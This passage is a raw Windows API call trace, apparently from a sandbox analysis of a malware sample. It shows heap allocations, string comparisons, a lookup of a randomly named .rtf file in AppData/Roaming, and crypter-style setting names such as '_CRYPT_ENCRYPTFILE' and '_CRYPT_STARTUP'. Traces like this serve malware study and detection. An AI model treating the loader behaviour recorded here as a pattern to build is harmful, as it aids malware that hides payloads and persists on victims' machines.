lpString1="4zJ1bJ59OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zJ1bJ59OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J1bJ59OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1bJ59OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bJ59OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J59OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="59OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OB.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.826] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0240.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0240.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0240.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0240.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yYa4EeIK4zJ1bJ59OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ya4EeIK4zJ1bJ59OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a4EeIK4zJ1bJ59OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4EeIK4zJ1bJ59OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EeIK4zJ1bJ59OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eIK4zJ1bJ59OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IK4zJ1bJ59OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K4zJ1bJ59OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4zJ1bJ59OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zJ1bJ59OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J1bJ59OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1bJ59OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0240.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bJ59OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0240.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J59OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="59OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0240.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0240.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OB.rtf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.827] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0240.827] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0240.827] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0240.827] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0240.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0240.828] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0240.828] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0240.828] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0240.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.829] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0240.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.829] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/yYa4EeIK4zJ1bJ59OB.rtf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22717e40, ftCreationTime.dwHighDateTime=0x1d5f054, ftLastAccessTime.dwLowDateTime=0xa6d7d3c0, ftLastAccessTime.dwHighDateTime=0x1d5ee59, ftLastWriteTime.dwLowDateTime=0xa6d7d3c0, ftLastWriteTime.dwHighDateTime=0x1d5ee59, nFileSizeHigh=0x0, nFileSizeLow=0xe9fe, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="yYa4EeIK4zJ1bJ59OB.rtf", cAlternateFileName="YYA4EE~1.RTF")) returned 0xa87650 [0240.829] FindClose (in: hFindFile=0xa87650 | out: hFindFile=0xa87650) returned 1 [0240.829] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0240.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0240.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0240.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0240.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0240.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0240.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0240.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0240.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0240.832] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0240.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.832] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0240.832] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0240.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0240.832] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0240.833] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0240.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0240.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0240.833] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0240.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0240.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0240.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0240.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0240.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0240.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0240.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0240.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0240.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0240.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0240.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0240.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0240.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0240.834] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0240.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0240.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0240.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0240.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0240.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0240.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.835] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.835] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0240.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.835] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0240.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0240.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0240.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0240.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0240.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0240.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0240.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0240.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0240.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0240.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0240.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0240.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0240.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0240.836] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0240.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0240.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0240.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0240.836] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0240.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0240.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0240.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0240.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0240.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0240.836] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0240.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0240.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0240.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0240.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0240.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0240.837] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0240.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0240.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0240.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0240.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0240.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.838] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0240.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0240.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0240.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0240.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0240.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0240.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 